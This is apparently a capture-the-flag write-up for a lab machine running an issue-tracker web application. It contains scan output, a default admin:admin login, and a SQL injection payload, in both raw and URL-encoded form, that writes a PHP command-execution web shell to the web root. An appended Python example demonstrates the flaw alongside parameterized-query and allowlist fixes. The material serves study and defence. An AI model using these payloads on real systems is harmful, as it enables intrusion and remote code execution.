Target IP: 192.168.171.147
Challenge Description: 1.21 GigHawats.
Running an nmap scan shows there are four TCP ports open on the target machine, as shown above.
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| <a href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| <a href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 10 Sep 2023 19:13:11 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
Performing an aggressive nmap scan with the command sudo nmap -sV -A 192.168.171.147 -p 22,17445,30455,50080 against the open ports returns the result above. By the looks of it, SSH is running on port 22, and the remaining open ports are serving HTTP applications.
Port 17445: HTTP
Browsing to this port displays the webpage above. It looks like some sort of issue-tracking application.
I registered a new user with the credentials test:test. Using this new user, I am able to see the different users of this application. One user that stands out to me is clinton, as shown above. I changed the password of the user clinton to test using the Edit button from the image above, but I am unable to do anything useful with it. I performed a directory search against this web application and found /login and /register, but I did not find anything useful.
Port 50080: HTTP
The webpage above is shown for this web application.
Doing a directory search against this application returns the result above. The directory /cloud sounds interesting.
Browsing to /cloud returns the login page above for this application. It prompts me to log in, but I have not found any credentials so far.
Using the credentials admin:admin, I gained access to this web application. The webpage above is shown after logging in successfully as the user admin. There are interesting files, such as issuetracker.zip, that I have access to on the target machine.
Opening the issuetracker.zip file displays the contents shown above inside this directory. I also tried uploading a PHP web shell, but I could not access it. Time to enumerate harder. I downloaded the issuetracker.zip file on my machine.
Running tree shows the contents of the Java application above. There are some interesting Java files.
After some enumeration, I found something interesting: the Java class file IssueController contains the juicy information above. Not only does it contain hard-coded credentials that can be used after exploitation, it also looks like the target machine is vulnerable to SQL injection, as shown above. The parameter priority of the URL mapping /issue/checkByPriority can be used to perform this SQL injection.
I URL-encoded the payload Normal' UNION SELECT "<?php echo system($_GET['cmd']);" INTO OUTFILE '/srv/http/cmd.php'; -- to upload my PHP webshell.
After URL-encoding it, I sent it to http://192.168.171.147:30455/issue/checkByPriority?priority=Normal%27%20UNION%20SELECT%20%22%3C%3Fphp%20echo%20system%28%24_GET%5B%27cmd%27%5D%29%3B%22%20INTO%20OUTFILE%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B%20--%20 on the target machine via the POST method, as shown above.
And now I can access my web shell, as shown above, using the parameter cmd at http://192.168.171.147:30455/cmd.php.
And the proof.txt flag is shown above. GG.
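The root cause behind the /issue/checkByPriority injection is a query built by string concatenation, so a quote in the priority value ends the literal and the rest of the input is parsed as SQL. The following is an added example, not code from the write-up or from the issuetracker.zip application: it reproduces the flaw and its fix in Python against an in-memory SQLite table rather than the Java/Spring code in the zip (which the page does not reproduce), shows the bound-parameter and allowlist hardening side by side, and decodes a constructed, URL-encoded request line the way a log-review script would. The table and column names, the set of legal priorities, and the sample rows are all assumptions.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the issue tracker's database. The real schema is not
# shown on the page, so these table and column names are assumptions.
SCHEMA = """
CREATE TABLE issues (id INTEGER PRIMARY KEY, message TEXT, priority TEXT);
CREATE TABLE users  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO issues (message, priority) VALUES ('Login page is slow', 'Normal');
INSERT INTO issues (message, priority) VALUES ('Crash on save', 'High');
INSERT INTO users  (username, password) VALUES ('clinton', 'constructed-secret');
"""

# Assumed set of legal values for the priority field; the application's real
# list is not on the page.
ALLOWED_PRIORITIES = frozenset({"Low", "Normal", "High"})


def open_db():
    """Fresh in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def check_by_priority_vulnerable(conn, priority):
    """The flaw: the parameter is concatenated into the SQL text, so a quote
    in the value closes the string literal and the remainder is parsed as SQL."""
    sql = "SELECT id, message FROM issues WHERE priority = '" + priority + "'"
    return conn.execute(sql).fetchall()


def check_by_priority_safe(conn, priority):
    """The fix: the value travels as a bound parameter. The SQL text is fixed
    before the engine sees the value, so a quote is just another character."""
    sql = "SELECT id, message FROM issues WHERE priority = ?"
    return conn.execute(sql, (priority,)).fetchall()


def validate_priority(priority):
    """Second layer: an enumerated field should only accept enumerated values.
    Returns True for a legal value and False for anything else."""
    return priority in ALLOWED_PRIORITIES


def priority_from_request(url):
    """Extract the decoded priority value from a logged request URL so the raw
    (URL-encoded) line can be checked against the allowlist. Returns None when
    the parameter is absent."""
    query = urlsplit(url).query
    values = parse_qs(query, keep_blank_values=True).get("priority")
    return values[0] if values else None


# Constructed log line in the shape of the request from the write-up: a UNION
# appended to the priority parameter, URL-encoded. The IP is the page's target.
CONSTRUCTED_REQUEST = (
    "http://192.168.171.147:30455/issue/checkByPriority?priority="
    "Normal%27%20UNION%20SELECT%20username%2C%20password%20FROM%20users%20--%20"
)


def demo():
    """Run both versions with a benign value and with the decoded payload."""
    conn = open_db()
    payload = priority_from_request(CONSTRUCTED_REQUEST)
    return {
        "benign_vulnerable": check_by_priority_vulnerable(conn, "Normal"),
        "benign_safe": check_by_priority_safe(conn, "Normal"),
        "payload_vulnerable": check_by_priority_vulnerable(conn, payload),
        "payload_safe": check_by_priority_safe(conn, payload),
        "payload_allowed": validate_priority(payload),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Running demo() shows the vulnerable query returning the users table alongside the issues for the injected value, while the parameterized query returns no rows for it and the allowlist rejects it outright. The INTO OUTFILE step in this write-up depends on two further conditions worth checking on any MySQL/MariaDB deployment: the application's database account holds the FILE privilege, and secure_file_priv is unset or points at a directory the web server serves; restricting either one stops a SQL injection from turning into a file write in the web root.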